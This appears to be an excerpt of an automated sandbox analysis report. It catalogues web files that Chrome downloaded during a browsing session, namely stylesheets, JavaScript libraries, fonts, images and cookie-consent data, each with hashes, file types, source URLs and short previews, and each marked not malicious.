                                                                                                                                                                                                                                                                                SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):11640
                                                                                                                                                                                                                                                                                Entropy (8bit):4.834037171431864
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:7VtvbKzjdc6dPKV4VxVKUTGZ/USNbKqCOiUHCJhTExV0y0i0Y050gDtBv+1yCyFl:ZROMyFg46rkI2ttvVaafpqE1Fm4
                                                                                                                                                                                                                                                                                MD5:B6C3D2FEC2782277D95B6887BE55C18D
                                                                                                                                                                                                                                                                                SHA1:FAB01BD3293CF6D1F68A99EAFCBAF0E2EB937699
                                                                                                                                                                                                                                                                                SHA-256:2B7CF996111633AA7A1865C5C69924036A194B61D3EBE5117D8703A985EB74F1
                                                                                                                                                                                                                                                                                SHA-512:30C6E2E0C7DE73A17CB027D9C9C95DB6E4C2908B28C82600DCB92F8B9E80F50B569A7319E083F082A4A55A5C9889E590E1EB554970E8C8E8B8F9F971E6CBE120
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/tm-mega-menu/public/assets/css/style.css?ver=1.1.2
                                                                                                                                                                                                                                                                                Preview:.tm-mega-menu {. box-sizing: border-box;. list-style: none;. padding: 0 !important;. position: relative !important;. z-index: 99;. max-height: inherit;.}..tm-mega-menu.mega-menu-direction-horizontal {. display: -webkit-box !important;. display: -webkit-flex !important;. display: -ms-flexbox !important;. display: flex !important;. -webkit-flex-wrap: wrap;. -ms-flex-wrap: wrap;. flex-wrap: wrap;.}..tm-mega-menu.mega-menu-mobile-on {. background: #fcfcfc;. clear: both;. display: none !important;. float: none !important;. width: 100% !important;.}..tm-mega-menu.mega-menu-mobile-on li[class*="menu-columns"] {. clear: both;. width: 100% !important;.}..tm-mega-menu.mega-menu-mobile-on .tm-mega-menu-top-item > a,..tm-mega-menu.mega-menu-mobile-on .tm-mega-menu-sub-item > a {. position: relative;.}..tm-mega-menu:after {. clear: both;. content: '';. display: block;. width: 100%;.}..tm-mega-menu-mobile-trigger, .tm-mega-menu-mobile-close {. background: #fff;.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, was "main.97c41ef3.js", last modified: Fri Aug 23 15:57:59 2024, from Unix, original size modulo 2^32 83598
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):27512
                                                                                                                                                                                                                                                                                Entropy (8bit):7.993187350119009
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:768:CsfAgqyshviKsrws/XBA/GaFemZwlZwwjBBJKaduJDp:jogqyshv/srwgoGaFN23jP4wiN
                                                                                                                                                                                                                                                                                MD5:0304D337D72A7B17907261BF86E2F221
                                                                                                                                                                                                                                                                                SHA1:D56F37B6686036EE3945D877BAF2849245073FCE
                                                                                                                                                                                                                                                                                SHA-256:F8501D2AAB7B556B8D8A56E8F7C6E9E21D01204249AC6D43470015AA86E2A5A7
                                                                                                                                                                                                                                                                                SHA-512:6D15FC21EFD7CB6BDD2924CB9C16E1B8ABF070AFBA1C63B7FAF998A1CB7ACB3A0CAD5F52EC27EE8763328669F40AD50CA32D62A2E94AF4073218C5DC4B79FFA3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://s.pinimg.com/ct/lib/main.97c41ef3.js
                                                                                                                                                                                                                                                                                Preview:.......f..main.97c41ef3.js..\.o...*...b%...8.,.h{3`.[;,.... Pl:..Py..47.>.;..%..4....D......?.C.`Y.HRn3.p.g..>l.....B5.i.D.q;;...)^.$..:<.]..&.D.>l...G.y.^.|X......7kz...M....pN3....2./..d..%.l>_...b.`.._..e.^v{`..fY|.f!..b"d[..z.A.<X.Wo/..*.oX...__..~_....Td...._..]#..u.]../.X3kK......<.R.(..8....E...Nl`.{..D..,.<..S+.#XTO........."2ZB.g,....zM......(s-h....v...s.c q..5K9Y..-........2.\....f;.L.B.r3BJ..1d.o,..I.c.a1..T..$..6ly....w....r9..6.z...M....6\...;.y..._@.7.....S.'[.. ..........lz.;.....O....#......J..._...._..................|4>.M.G.......q0.V./..`.R.Xe.]....o1.b'Y..f..au.E.....Y...._..U-L..H........J...Br..j>...V............((A.{UY..}`....U....".s....t@.W$P.-..K...ZiVf#...Z.v.`..4..=.......B~...2.......L.\.'.@...].pw.zq..^..(.'..3.........4)L.,....<-.UT^.).XD.x...e`ML..O..&T..r.......{.~.......-Q.!s...2g..20-D.F.L.Xn.].Q...f..RJ.ZI.lN.m......~u..v.7%.#....m.Pn.v$4....v..M........>gT...0....Y%.).6s;+......vA.v.d.Z...p...C....x..
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3842)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):8258
                                                                                                                                                                                                                                                                                Entropy (8bit):5.031100331631844
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:lbRZYx3QLRq36US3L5E6PQ01/htb+bDk7bDjx6wxwtwnw1MiWL6Qu:lOQI36UqPQ2bbcgjaWwGV6Qu
                                                                                                                                                                                                                                                                                MD5:180F3FB3F853145B68AD3C210A989F42
                                                                                                                                                                                                                                                                                SHA1:DC1BEEBD61A6C56400563A0AF927F277B6290078
                                                                                                                                                                                                                                                                                SHA-256:9BCCE3EBDA2859460D9F117931E0AF97FC4374204AA1CD7136FB59BA66DF9BE8
                                                                                                                                                                                                                                                                                SHA-512:24A6BAA116E2730D30D06719E162FD1172D6B82F725F1C2FD30593DED5600E6F38BB122A6AF4D4E0773F260110AF9A3002CB0F57C7529C53E40AE960FB95239D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://kengegame.web.app/background-styles.css
                                                                                                                                                                                                                                                                                Preview:type="text/css" data-fbcssmodules="css:fb.css.base css:fb.css.dialog css:fb.css.iframewidget css:fb.css.customer_chat_plugin_iframe">.fb_hidden{position:absolute;top:-10000px;z-index:10001}.fb_reposition{overflow:hidden;position:relative}.fb_invisible{display:none}.fb_reset{background:none;border:0;border-spacing:0;color:#000;cursor:auto;direction:ltr;font-family:"lucida grande", tahoma, verdana, arial, sans-serif;font-size:11px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:1;margin:0;overflow:visible;padding:0;text-align:left;text-decoration:none;text-indent:0;text-shadow:none;text-transform:none;visibility:visible;white-space:normal;word-spacing:normal}.fb_reset>div{overflow:hidden}@keyframes fb_transform{from{opacity:0;transform:scale(.95)}to{opacity:1;transform:scale(1)}}.fb_animate{animation:fb_transform .3s forwards}..fb_dialog{background:rgba(82, 82, 82, .7);position:absolute;top:-10000px;z-index:10001}.fb_dialog_advanced{border-radiu
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2927
                                                                                                                                                                                                                                                                                Entropy (8bit):4.78671986137601
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:Y9vlgI2UHg40MKHPXPoFbRBeklhiZHpfrgh8aQYa6AyY7HscYFnnrZjS0rZjfum4:OyI2ig40eeuhiZpfEHQYa6AyF1NjTjV4
                                                                                                                                                                                                                                                                                MD5:999A95A29ED85D1D26944F8C64EEFCC2
                                                                                                                                                                                                                                                                                SHA1:C8DE9CC34669C1F39997663C0C406427903EB105
                                                                                                                                                                                                                                                                                SHA-256:DD9700763251EBAE0A2524A492CD5585E92BBA7712D9FD2E36773F0C015A2F3D
                                                                                                                                                                                                                                                                                SHA-512:4379D3061B5CF6B172C0CD13768C0ADBE035D878784274EE7AB1F485FE1E18941E95EF3870E17E3A05A3E4E40761E82D24324E890DDAD8EE77DADA5EE2567896
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://cdn.cookielaw.org/consent/0232e281-a585-4e05-8d99-2fec39bf53fe/0232e281-a585-4e05-8d99-2fec39bf53fe.json
                                                                                                                                                                                                                                                                                Preview:{"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"PRODUCTION","Version":"6.14.0","OptanonDataJSON":"0232e281-a585-4e05-8d99-2fec39bf53fe","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"433e385e-3ee9-4687-8aec-4e957b0cb255","Name":"CM US only","Countries":["us"],"States":{},"LanguageSwitcherPlaceholder":{"default":"en"},"BannerPushesDown":false,"Default":false,"Global":false,"Type":"GENERIC","UseGoogleVendors":false,"VariantEnabled":false,"TestEndTime":null,"Variants":[]},{"Id":"f54f29ef-74d5-45b2-8c69-54124e98661e","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","sd","bs","bt","sg","bv","bw","sh","by","sj","bz","sl","sn","so","ca","sr","ss","cc","cd","st","cf","sv","cg","sx","ch","sy"
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), CFF, length 27576, version 1.0
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):27576
                                                                                                                                                                                                                                                                                Entropy (8bit):7.989978092325596
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:Fb7aeT70PQOkQ3YECBxyzehTAxHqH20Oq:Fb7nHoQQIEkRkqH20Oq
                                                                                                                                                                                                                                                                                MD5:A27742F8EC754D21B60253DD82C90567
                                                                                                                                                                                                                                                                                SHA1:00B495E562369CB33609A97D24822DAD5F72238E
                                                                                                                                                                                                                                                                                SHA-256:4983DF35C0D65A81AC3D85C644D382550360ECB4F3B8C2044E898F140504B419
                                                                                                                                                                                                                                                                                SHA-512:8CE06FE9524EC2AE3E70BD5EE6C58417DC5ADBCA58BD7A43E623BC21BF42CD3AF86866D1D6203005F039E4ABBEFC99113EF52DA21382C4C0742E4E1369AF1953
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://use.typekit.net/af/6bc5ed/00000000000000007735adb4/30/l?subset_id=2&fvd=i3&v=3
                                                                                                                                                                                                                                                                                Preview:wOF2OTTO..k...........kY...........................J?DYNA.j..6?GDYN.Y.....`..N.6.$..L....N. .....(......y.....(.I=...zI.7U...................#........U.>.......?........pT...<n.Q.6bbAK.(*X.. .........M(.......HJ.c...:.}....7...y..h.P.a.?7..)..?V.?.%v$.r...#...`S......v......^._.[.."...<Ke.2..0bzb..}...........e..?.....W.+..+s..._3...#.FY.COK.la;DV.l..BE....Ieb>1e.'.!b.Q...D@s..Y....>wj.u*.....yL/9...;..v.qg&...Z.<....<=.Y...R..ia...;\.Y....O9sN..o3m.1h.cT...uRT.IS...mv..Y.5IA..e..bn....I..k7 ..I..u.e..PT.. WN:n.i...._.V[Z.MR.[BG.St.%U1...>~W...o..h.-.%.M.=..cE..E..+..:..........U.R...y.Y..p.`b^nZ..I/.Z.BU.B.=.9J....a....b1.......A.e..,..v..w?B.-K..hS:0.9W._L:/.....i.W].q6.W....jSVY.Y.r.s7U..E......T.*.z.l.T..XZ......(...h.....{.c3..L.<n..../w.X5...f.7{....l.g.E..m...d!h.^/...O.s........'..^1...2.5.B...'M..p.....|..v....(WJ/..H.w;_......#..p,.2,.......E\.M..S..k..{|@..Q...*....Tw.vg.Yw.*QO.BCi....4....ZJ.....Ct8h.4.v.........8..qcn...?..DN.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 100 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):14089
                                                                                                                                                                                                                                                                                Entropy (8bit):7.976592362302984
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:rDKNL0+77kVfqu9Iqek73nmOLenvoIicreRbp24s1Ibt6VNw171:rMRyS/jk73x50erBs1Ib6w
                                                                                                                                                                                                                                                                                MD5:B42FA21CA9A96B786D9BC01F5EF8315D
                                                                                                                                                                                                                                                                                SHA1:3B64E5039E14506BB32EFD1F6C9B3650B18D321F
                                                                                                                                                                                                                                                                                SHA-256:124F87D02A16BBDDEA9D2972C333FD44F4AAEA6CE9BE9449FC8F7B012CCDC307
                                                                                                                                                                                                                                                                                SHA-512:93029E13E14F6384400DA4B91EE59C321DCFCCE88888ADE1A68230ED957B9D3BD9508B99F91D92EB9108532F389760E3BBBB3D589A8F4FF075DA5BBC2EADF460
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...d...^............7iCCPicc..H..W.XS...[..@B. %.&.H. %..@z.l.$@(1....]Tp.b...*....#v....E..u.`W...............;....bq...@.(_........ u..`....../O.........w7.7.k.2....W....x. .....x.......%...e...|.....%0A...p..W.p......!n.@E..d.@k.<....5h}.;..B.....}ss'.!N.....!..3.~....f.&..1..s..J.0O.......[n.t0..lj...X.a.ngO..a5.{Ei.Q.kA.A..C.R2........5...;....B.,..P.i..`..p....|N<.z./....)}6K&.*c.u..6K._.J.qe..J..XJ....R...e.'AL..@...1.b..p...Lv.D.+....X.($@....K.c....y...6g.9.J| ?3>TQ........D..A.A.......A..c..QB.R.8? V1...s..... 'D.A.W....'...........<.,nX.".|...l...@.[..........^)z...H@....%38"I.#..8P...H.....{...._.X.....{..#..S.sA8..R.(.P.D..2..D......&.... ..aA&B.H.#2..=.A.@b(1.h...7.......L.sp....O.......I.b.OY...P?XY...k.[AM7<....P.........p?....le..0~....~..J?...%.#..m~.I......j.c}.....=..s|.....s...B. v.;.].a.............'..5.-V.O6...#....U2..../_P({G..d.4.0#3..._...#.9.`.8... ..(^_ob...D..;7...|N........`..|..|.l...
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1644), with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):17066
                                                                                                                                                                                                                                                                                Entropy (8bit):5.199220361118455
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:ev/8a6rZJKmfwwiPlJ954FzSZ867AZPSwH:e38r7fFiPp54FzSy67WR
                                                                                                                                                                                                                                                                                MD5:393E34B31ED89C34E440787629D51299
                                                                                                                                                                                                                                                                                SHA1:CAE5EDE0F25B66B2B9F92C7F3A5193FCEFEFC95B
                                                                                                                                                                                                                                                                                SHA-256:0CDC2469F577029C1CF978A78488F1DB719AD6EB14B40D2F8AF32BB6F87CA75B
                                                                                                                                                                                                                                                                                SHA-512:61EFCC91A69296F0FF0ECD6B70D82425DB47A16FFD0D8ACB77E958F6E9CB4D4BA6366308B603F3DB157442172293EDD34391671E7807D38037D5F236B5695A1A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/swiper.min.css?ver=3.3.0
                                                                                                                                                                                                                                                                                Preview:.swiper-container{margin:0 auto;position:relative;overflow:hidden;z-index:1}...swiper-container-no-flexbox .swiper-slide{float:left}...swiper-container-vertical>.swiper-wrapper{-webkit-box-orient:vertical;-moz-box-orient:vertical;-ms-flex-direction:column;-webkit-flex-direction:column;flex-direction:column}...swiper-wrapper{position:relative;width:100%;height:100%;z-index:1;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-transition-property:-webkit-transform;-moz-transition-property:-moz-transform;-o-transition-property:-o-transform;-ms-transition-property:-ms-transform;transition-property:transform;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}...swiper-container-android .swiper-slide,.swiper-wrapper{-webkit-transform:translate3d(0px,0,0);-moz-transform:translate3d(0px,0,0);-o-transform:translate(0px,0);-ms-transform:translate3d(0px,0,0);transform:translate3d(0px,0,0)}...swiper-container-multirow>.s
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10241), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):10241
                                                                                                                                                                                                                                                                                Entropy (8bit):5.165608083920421
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:EajuLigkRhS1rNp7NWzdkfszvx3imWAel/L0Fx18b2Vauta2fI/OTz+UCR7:EajuLigWhS1rT7NW2fszhibLexa2VauK
                                                                                                                                                                                                                                                                                MD5:7BE65AC27024C7B5686F9D7C49690799
                                                                                                                                                                                                                                                                                SHA1:241ADA4A86443ADC5623D1A3A8018A96D9DE6D5A
                                                                                                                                                                                                                                                                                SHA-256:52DB930F81D97113DDE679CAC624CB5435B56D4AC486E91A0B6692D2CB615A84
                                                                                                                                                                                                                                                                                SHA-512:BBE6373705C81DA5C7C3C132583338B875CA76CD5F963DFBA95195BD8E2710E819B62924130F49B04FC0EA07E35677580924575D62E8CBCE75D1644CE5F96D15
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.6
                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var t={d:(e,s)=>{for(var i in s)t.o(s,i)&&!t.o(e,i)&&Object.defineProperty(e,i,{enumerable:!0,get:s[i]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};function s(t){if(this.formData={},this.tree={},!(t instanceof FormData))return this;this.formData=t;const e=()=>{const t=new Map;return t.largestIndex=0,t.set=function(e,s){""===e?e=t.largestIndex++:/^[0-9]+$/.test(e)&&(e=parseInt(e),t.largestIndex<=e&&(t.largestIndex=e+1)),Map.prototype.set.call(t,e,s)},t};this.tree=e();const s=/^(?<name>[a-z][-a-z0-9_:]*)(?<array>(?:\[(?:[a-z][-a-z0-9_:]*|[0-9]*)\])*)/i;for(const[t,i]of this.formData){const o=t.match(s);if(o)if(""===o.groups.array)this.tree.set(o.groups.name,i);else{const t=[...o.groups.array.matchAll(/\[([a-z][-a-z0-9_:]*|[0-9]*)\]/gi)].map((([t,e])=>e));t.unshift(o.groups.name);const s=t.pop
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1500x1875, components 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):261527
                                                                                                                                                                                                                                                                                Entropy (8bit):7.976955781644924
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:h/2wtRhKzvFU7lR5J6vSNLLV3yVBEhF2iQ1IjfHrLh:AwtUvFUn6KNXtFQ1SrLh
                                                                                                                                                                                                                                                                                MD5:6D27CB4F6C7E76B8A823B582CDF9954E
                                                                                                                                                                                                                                                                                SHA1:7E392036DA8D0070F6D32F379A2A85D352D23242
                                                                                                                                                                                                                                                                                SHA-256:6A28D6707E2199B3B66998CF6BD28C97E7AF0837BCB82445AA4B93BDF42CF63B
                                                                                                                                                                                                                                                                                SHA-512:9D529775ED9E48317055DC6549A4B0B4FA6CE5D03C78894BC7D2C375B51547AB7F7C81CE5F0063E3E495B9F1E910FE3D42C6BBB3BE63B865E98607F74EE5839B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:......JFIF.............C..............................................!........."$".$.......C.......................................................................S....".........................................J.......................!.1..AQ."aq.2...#..3B....$R.4Cb...%r..5S.c.&'Ds..................................6........................!1A.2Q.".3aqR....#...Bb..r.C............?....M.s2...z..:...IO.......a0Zs....0.i 0...KI.eUi..S.0.."y..=...R..t.F0U..;.&.@.pA..D.N.!-.3*0 ...W`.6.fA..E...m.~`....z#...D4..*2G..q$..d.....7..J.m.U.gl.+4.\.|...V)...W..m?Ei.f6'uc....F.l7W.!..xT..L..JF[....n./.#....y.....3.G.~......tO...0.........wq..z.u7.\..S..VT[.S..H`(j..TU;.@9Yw..De_.$..]s.9X....r...$m..u.L.s..0p..n7<........k..GuN......c .....TM$.#\....e......oI).#`}.1.*....'.....+bp.D.s....!.`P..cm.........(.$tI..Rr.fBE...)..|.A...s.0.h.M).....R..)r...2.... ..m..;O~..=...A....$.."$...p..T.r..|..X..`.`...{..Qr......l.@...T].......e],.F.y=.8E.H...*....*....]. ..iT...$*.crN..Vo..R..9H
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 71896, version 4.393
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):71896
                                                                                                                                                                                                                                                                                Entropy (8bit):7.996746194687547
                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                SSDEEP:1536:tA4xrPyfyECsyz2wCjYfhO/ORzc7erabg5Z06GEQMo:t3jayEC/2/OI/gcq+bg5C6G7
                                                                                                                                                                                                                                                                                MD5:E6CF7C6EC7C2D6F670AE9D762604CB0B
                                                                                                                                                                                                                                                                                SHA1:97E438CC545714309882FBCEADBF344FCADDCEC5
                                                                                                                                                                                                                                                                                SHA-256:7DACF83F51179DE8D7980A513E67AB3A08F2C6272BB5946DF8FD77C0D1763B73
                                                                                                                                                                                                                                                                                SHA-512:DD945FACE918EDF20B7283B7416AE7B3735269945E3F3E379E770425024C1DE1FCDC7CFB952381D295D0D1F58C8AB191FD29030F2051D10501557BD7BFBE3658
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/fonts/fontawesome-webfont.woff2?v=4.6.3
                                                                                                                                                                                                                                                                                Preview:wOF2..............T....y........................?FFTM.. .`........P..K.6.$........ ..|..L?webf.[8....m;.t.........c6.....>.S.8.{...]?....?=i..%...P......f85J.0..u....f...eB.\...E.l.....Aw..6...f..F...0l...M.`;i.O.U....k."=........./6../eX.q..vf{].-.o,.5.&.}.L..:...0.{.e..V*3~....1Mh.M4:9jG..B......K...Y..2c.=..@..V*+..=.g.;..%.q,..sYF.oj..D..t....wZ1t.S\...L.....k(...1CK.z.Z!.iM....zH.....D[gcN........E.~.j.VD..[../..TD..........<@.j.cl...}.s.g4...F.f.F..;...H...E...P.#I..1{..X....]..ps.........^(.S........N...1S.....$@..T.\..k"G". V.Z..gf?.{..D..8f............9....g.i.\..... .".u^.+....%...u.S...!.J.Y5.{k..j..J.....i....!..t."...v...C..0...p..as..g.3.....~3/.3.<s.....K...u..t.n.......tS.|..].~..I* ...I......7y..EL@.B.%....TTT.zu\.....eb.bM..-f.?.... .Os$/.Y....u..7..F.Q5.F..........%.......b`...o....o....c...t..@7.*.{HK...P..9..(.*[..&&..{...W.0e.....8.v.h.a..-..%./..wgg.|.\E.x.^;H...D..(.J&......D.mo}..0.i...g#.i{....4.3f.;.m.......v{GbP...T.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65467)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):266749
                                                                                                                                                                                                                                                                                Entropy (8bit):5.228193094831099
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3072:aoIU2dSBcvXVHOsUvH60ct9ltNj0LsNMMg9ixQ:aox2dhus8HqCsNM9
                                                                                                                                                                                                                                                                                MD5:65E26242174E7F2D8845E29AA884AD31
                                                                                                                                                                                                                                                                                SHA1:D4839F4DBDF592B943AB233384D5FD25445447FA
                                                                                                                                                                                                                                                                                SHA-256:75C0D8550E4EFF9E0B53BDA398AF84ABEA910F72360D54DDD3353ADC2E2E2487
                                                                                                                                                                                                                                                                                SHA-512:1AA58D2CD5AC77459FFE543B6EFFA8256E74EEC36EF573C1FF75A78D4D46B6CF3E03F0B35865120E62F3608551801C34CE3351FD340CE84EE47D7A12CA1B0631
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*! For license information please see site-bundle.js.LICENSE.txt */.!function(t,e){if("object"==typeof exports&&"object"==typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{var r=e();for(var n in r)("object"==typeof exports?exports:t)[n]=r[n]}}(self,(function(){return function(){var t,e,r,n,o={44564:function(t,e,r){"use strict";r.r(e),r.d(e,{ResizeObserver:function(){return q},ResizeObserverEntry:function(){return E},ResizeObserverSize:function(){return u}});var n,o=[],i="ResizeObserver loop completed with undelivered notifications.";!function(t){t.BORDER_BOX="border-box",t.CONTENT_BOX="content-box",t.DEVICE_PIXEL_CONTENT_BOX="device-pixel-content-box"}(n||(n={}));var a,c=function(t){return Object.freeze(t)},u=function(t,e){this.inlineSize=t,this.blockSize=e,c(this)},s=function(){function t(t,e,r,n){return this.x=t,this.y=e,this.width=r,this.height=n,this.top=this.y,this.left=this.x,this.bottom=this.top+this.height,this.right=this.left+thi
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):35
                                                                                                                                                                                                                                                                                Entropy (8bit):2.9302005337813077
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:CUHaaatrllH5:aB
                                                                                                                                                                                                                                                                                MD5:81144D75B3E69E9AA2FA3E9D83A64D03
                                                                                                                                                                                                                                                                                SHA1:F0FBC60B50EDF5B2A0B76E0AA0537B76BF346FFC
                                                                                                                                                                                                                                                                                SHA-256:9B9265C69A5CC295D1AB0D04E0273B3677DB1A6216CE2CCF4EFC8C277ED84B39
                                                                                                                                                                                                                                                                                SHA-512:2D073E10AE40FDE434EB31CBEDD581A35CD763E51FB7048B88CAA5F949B1E6105E37A228C235BC8976E8DB58ED22149CFCCF83B40CE93A28390566A28975744A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
